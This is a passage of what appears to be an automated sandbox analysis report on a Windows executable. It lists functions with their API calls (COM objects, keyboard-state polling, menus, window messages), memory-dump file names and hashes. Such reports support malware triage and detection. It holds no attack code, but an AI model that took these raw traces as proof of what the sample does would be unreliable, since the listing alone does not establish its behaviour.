                                                                                                                                                                                                                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00F8480E
                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00F84932
                                                                                                                                                                                                                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00F8496B
                                                                                                                                                                                                                                                                                        • CoGetObject.OLE32(?,00000000,00FA0B64,?), ref: 00F8498A
                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00F8499D
                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F84A21
                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F84A35
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 429561992-0
                                                                                                                                                                                                                                                                                        • Opcode ID: cb8d24e527d7d13ce22d948abe3d68ff1813c6ae138e6490419e5d62d109799a
                                                                                                                                                                                                                                                                                        • Instruction ID: 5e962b815eb2a586f14abf5ec486a197f7210c6c9abcddae8bf23e4ba7d2d5c2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb8d24e527d7d13ce22d948abe3d68ff1813c6ae138e6490419e5d62d109799a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63C15571A043069FD700EF68C8849ABBBE9FF89758F10491DF9899B251DB30ED05EB52
                                                                                                                                                                                                                                                                                        Function 00F784DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F78538
                                                                                                                                                                                                                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00F785D4
                                                                                                                                                                                                                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00F785E8
                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(00FA0CD4,00000000,00000001,00FC7E8C,?), ref: 00F78634
                                                                                                                                                                                                                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00F786B9
                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 00F78711
                                                                                                                                                                                                                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00F7879C
                                                                                                                                                                                                                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00F787BF
                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00F787C6
                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00F7881B
                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 00F78821
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2762341140-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 89c4002d81c183068ee62f4761890663185a07edb4fcf3cf9eef6955c68f67a2
                                                                                                                                                                                                                                                                                        • Instruction ID: 142f5363b1dc2362b2ed2fbc6943fa285c28b2b788004d5a917ca4a42ec01ae2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89c4002d81c183068ee62f4761890663185a07edb4fcf3cf9eef6955c68f67a2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D6C12A75A00109EFDB14DFA4C888DAEBBF9FF48354B148099E41ADB261DB30ED46DB91
                                                                                                                                                                                                                                                                                        Function 00F60378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F6039F
                                                                                                                                                                                                                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00F603F8
                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F6040A
                                                                                                                                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00F6042A
                                                                                                                                                                                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00F6047D
                                                                                                                                                                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00F60491
                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F604A6
                                                                                                                                                                                                                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00F604B3
                                                                                                                                                                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F604BC
                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F604CE
                                                                                                                                                                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F604D9
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2706829360-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 61fc997205f632174481de19c9b7bf5df964e493086556f99f0db60607118d02
                                                                                                                                                                                                                                                                                        • Instruction ID: 02ff469f39148cfc9cb1ff1e929203de537aea53ee2c4781dba86f8c04fe1a58
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61fc997205f632174481de19c9b7bf5df964e493086556f99f0db60607118d02
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99415E35E0021DDFCB14DFA8DC449AEBBB9EF48354F108469E945A7261CB34A945EFA0
                                                                                                                                                                                                                                                                                        Function 00F6A635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00F6A65D
                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00F6A6DE
                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 00F6A6F9
                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00F6A713
                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 00F6A728
                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00F6A740
                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(00000011), ref: 00F6A752
                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00F6A76A
                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(00000012), ref: 00F6A77C
                                                                                                                                                                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00F6A794
                                                                                                                                                                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 00F6A7A6
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                        • Opcode ID: a5109335fa54cbde99549e7472d38477cc8587f90346c8bdf191b13c8b202318
                                                                                                                                                                                                                                                                                        • Instruction ID: 4a3225b79b0c9f1b56e65b559db3c45da439d80b87342ee3da6bab8398b24597
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5109335fa54cbde99549e7472d38477cc8587f90346c8bdf191b13c8b202318
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5341C674D047CA6DFF319B64C9043A5BEF06B12364F08805AD5C66A1C2EB959DC8EFA3
                                                                                                                                                                                                                                                                                        Function 00F89730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                                        • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                                        • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                                        • Opcode ID: f5e9b8c26273ed255da3a88fa25f5eca49e5ee070a4c9a5d399a83b4226da0fc
                                                                                                                                                                                                                                                                                        • Instruction ID: 2587d87bb437a3612daae83d3047b283a9551b2f66301d0d9fb47abfdbf13764
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5e9b8c26273ed255da3a88fa25f5eca49e5ee070a4c9a5d399a83b4226da0fc
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6851E531E081179BCF14EFA8C9419FEB3A5BF55360B644229E826E7284D7B5DD40F790
                                                                                                                                                                                                                                                                                        Function 00F84189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CoInitialize.OLE32 ref: 00F841D1
                                                                                                                                                                                                                                                                                        • CoUninitialize.OLE32 ref: 00F841DC
                                                                                                                                                                                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00FA0B44,?), ref: 00F84236
                                                                                                                                                                                                                                                                                        • IIDFromString.OLE32(?,?), ref: 00F842A9
                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00F84341
                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00F84393
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                                                                        • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                                                                        • Opcode ID: 892f8a534429a69ab4a1b38f62c216c7f112e9a360b2428bf26d2f929b79397f
                                                                                                                                                                                                                                                                                        • Instruction ID: adf06559df73234a9fd02ee6ba3902fbeb7594517ce3d5e5c8700d74aaa44ee2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 892f8a534429a69ab4a1b38f62c216c7f112e9a360b2428bf26d2f929b79397f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1061BF71608702DFC710EF64D889FAABBE4AF49714F10090AF8859B291CB74ED44EB92
                                                                                                                                                                                                                                                                                        Function 00F78BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLocalTime.KERNEL32(?), ref: 00F78C9C
                                                                                                                                                                                                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F78CAC
                                                                                                                                                                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F78CB8
                                                                                                                                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F78D55
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F78D69
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F78D9B
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F78DD1
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F78DDA
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                                                                                                                                        • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                                                                        • Opcode ID: 260f6c9bbfbde7057ce2739172c60c5e55ceaccc0ae7081d9a2bcab5eb1fc216
                                                                                                                                                                                                                                                                                        • Instruction ID: 64c0a3287f5aa54fa8055a4caac611fccb0447a3316dadbef8849c8278b49827
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 260f6c9bbfbde7057ce2739172c60c5e55ceaccc0ae7081d9a2bcab5eb1fc216
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A616C725043059FCB10EF60C84599EB7E8FF99320F04891EF999C7291DB35E946EB92
                                                                                                                                                                                                                                                                                        Function 00F946E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateMenu.USER32 ref: 00F94715
                                                                                                                                                                                                                                                                                        • SetMenu.USER32(?,00000000), ref: 00F94724
                                                                                                                                                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F947AC
                                                                                                                                                                                                                                                                                        • IsMenu.USER32(?), ref: 00F947C0
                                                                                                                                                                                                                                                                                        • CreatePopupMenu.USER32 ref: 00F947CA
                                                                                                                                                                                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F947F7
                                                                                                                                                                                                                                                                                        • DrawMenuBar.USER32 ref: 00F947FF
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                                                                        • String ID: 0$F
                                                                                                                                                                                                                                                                                        • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                                                                        • Opcode ID: f80c00ac4213e9fdc25168da2aa0a80c7abb4fb7b08f0da480692966d5a957cf
                                                                                                                                                                                                                                                                                        • Instruction ID: 221bf0bf543cf05c7472ef4979d7e85673b83613f831e104e5d37c90631bb3d3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f80c00ac4213e9fdc25168da2aa0a80c7abb4fb7b08f0da480692966d5a957cf
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E416775A01209AFEF24CFA4D884EEA7BB6FF59324F144029FA45A7390C770A915EF50
                                                                                                                                                                                                                                                                                        Function 00F6282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F64620
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00F628B1
                                                                                                                                                                                                                                                                                        • GetDlgCtrlID.USER32 ref: 00F628BC
                                                                                                                                                                                                                                                                                        • GetParent.USER32 ref: 00F628D8
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F628DB
                                                                                                                                                                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00F628E4
                                                                                                                                                                                                                                                                                        • GetParent.USER32(?), ref: 00F628F8
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F628FB
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                        • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                        • Opcode ID: f47d411e35e3d586bdd4e4e6aa0b492a4716f43f8c4b6dafebded91d70309777
                                                                                                                                                                                                                                                                                        • Instruction ID: 24fd4bfa12c659b6e06bd6133b53eb05ada62f02d2f72d2e58ee439c24be9a9b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f47d411e35e3d586bdd4e4e6aa0b492a4716f43f8c4b6dafebded91d70309777
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C521A475D00118BBCF05AFA0CC85EEEBBB4EF45350F10415AB951A72D1DB799809FB60
                                                                                                                                                                                                                                                                                        Function 00F6290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F645FD: GetClassNameW.USER32(?,?,000000FF), ref: 00F64620
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00F62990
                                                                                                                                                                                                                                                                                        • GetDlgCtrlID.USER32 ref: 00F6299B
                                                                                                                                                                                                                                                                                        • GetParent.USER32 ref: 00F629B7
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F629BA
                                                                                                                                                                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00F629C3
                                                                                                                                                                                                                                                                                        • GetParent.USER32(?), ref: 00F629D7
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F629DA
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                        • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                        • Opcode ID: 28861f0a683f098637fb5caf1837ac485b961969d1d2bda4ed40dea78f30892f
                                                                                                                                                                                                                                                                                        • Instruction ID: 17f3735c5b3501f574fc3ead38dc5d6e673cd22bbce16f2f41908197fbb4d98f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 28861f0a683f098637fb5caf1837ac485b961969d1d2bda4ed40dea78f30892f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B721C075D00118BBCF05ABA0CC85EEEBBB8EF45350F104016B991A72E1CB799809FB60
                                                                                                                                                                                                                                                                                        Function 00F944BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
